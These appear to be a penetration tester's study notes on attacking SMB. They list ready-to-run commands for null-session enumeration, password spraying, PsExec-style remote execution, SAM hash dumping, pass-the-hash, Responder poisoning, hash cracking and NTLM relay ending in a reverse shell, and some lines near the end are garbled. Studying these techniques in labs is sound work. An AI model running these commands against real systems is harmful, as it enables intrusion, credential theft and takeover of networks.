Skip to content

Attacking SMB

  • For shared access to files and printers across a network
  • Was designed to run on top of NetBIOS over TCP/139 and UDP 137,138
  • With Windows 2000, SMB runs directly over 445
  • NetBios is used as a failover now
  • If 139 is running, SMB is running over NETBIOS
  • SAMBA is a Linux implementation of SMB
  • MSRPC is commonly related to SMB

Misconfig

  • null session - no auth required

Anonymous auth

  • if no creds required or valid creds found, we can list the share, get/put files
  • tools: smbclient, smbmap, rpcclient, or enum4linux

File Share

  • smbmap -H 10.129.14.128
  • Permissions are also listed
  • smbmap -H 10.129.14.128 -r notes
  • -r/-R - recursively browse the target share
  • smbmap -H 10.129.14.128 --download "notes\note.txt"
  • smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" - upload to the share notes

RPC

  • rpcclient with a null session to enum a dc or a workstation
  • https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf
  • The rpcclient tool offers us many different commands to execute specific functions on the SMB server to gather information or modify server attributes like a username. RPCCLIENT Commands
  • rpcclient -U'%' 10.10.110.17

Enum4Linux

  • https://github.com/cddmp/enum4linux-ng
  • ./enum4linux-ng.py 10.10.11.45 -A -C

Protocol Attacks

Password Spraying

  • crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
  • --continue-on-success - continue after one cred is found
  • https://web.archive.org/web/20220129050920/https://mpgn.gitbook.io/crackmapexec/getting-started/using-credentials

info

  • smb attacks on Linux might be limited
  • smb on Windows has a greater attack surface
  • If this user is an Administrator or has specific privileges, we will be able to perform operations such as:
    • Remote Command Execution
    • Extract Hashes from SAM Database
    • Enumerating Logged-on Users
    • Pass-the-Hash (PTH)

RCE

  • Sysinternals hash technical resources and utilities to manage, diagnose, troubleshoot and monitor a windows env
  • has freeware tools

PsExec

  • We can download PsExec from Microsoft website, or we can use some Linux implementations:
  • Impacket PsExec - Python PsExec like functionality example using RemComSvc.
  • Impacket SMBExec - A similar approach to PsExec without using RemComSvc. The technique is described here. This implementation goes one step further, instantiating a local SMB server to receive the output of the commands. This is useful when the target machine does NOT have a writeable share available.
  • Impacket atexec - This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
  • CrackMapExec - includes an implementation of smbexec and atexec.
  • Metasploit PsExec - Ruby PsExec implementation.

Impacket-PsExec

  • impacket-psexec -h
  • impacket-psexec administrator:'Password123!'@10.10.110.17

CrackMapExec

  • crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

Enumerating Logged-on Users

  • If we are in a network with mutliple machines
  • We can have other machines having the same creds
  • crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Extracting Hashes from SAM DB

  • Security Account Manager (SAM) is a database file that stores users' passwords.
  • used for authing remote and local users
  • Hacking purpose:
  • Authenticating as another user
  • pass cracking
  • pass the hash
  • crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Pass-the-Hash (PtH)

  • If we get an NTLM hash of a user and we cannot crack it, we can use it authenticate over SMB
  • tools to use:
  • impacket
  • smbmap
  • crackmapexec
  • crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Forced Auth Attacks

  • Create a fake SMB server to capture users' NTLM hashes
  • Responder - https://github.com/lgandx/Responder
  • https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/
  • LLMNR, NBT-NS, MDNS, SMB poisoner tool with capabilities
  • LLMNR, NBT-NS by default
  • responder -I <interface name>

Start Responder on your tun0 interface

  • responder.py -I tun0
  • This will listen for traffic and capture hashes
  • Captured creds can be:
  • cracked using hashcat
  • relayed to a remote host to complete the auth and impersonate the user

Crack hashes

  • hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\

  • If hash is not cracked, we can relay the captured hash to another machine using

  • impacket-ntlmrelayx

  • Responder's - MutliRelay.py

  • Set SMB to off in the responder config file (/etc/responder/Responder.conf)

  • cat /etc/responder/Responder.conf | grep 'SMB ='
  • Execute impacket-ntmlrelayx
  • impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
    • by default - SAM db is dumped
    • -c to execute commands
  • Create a powershell #3 base64 reverse shell and run nc -nvlp 9001
    • impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e base64' 3.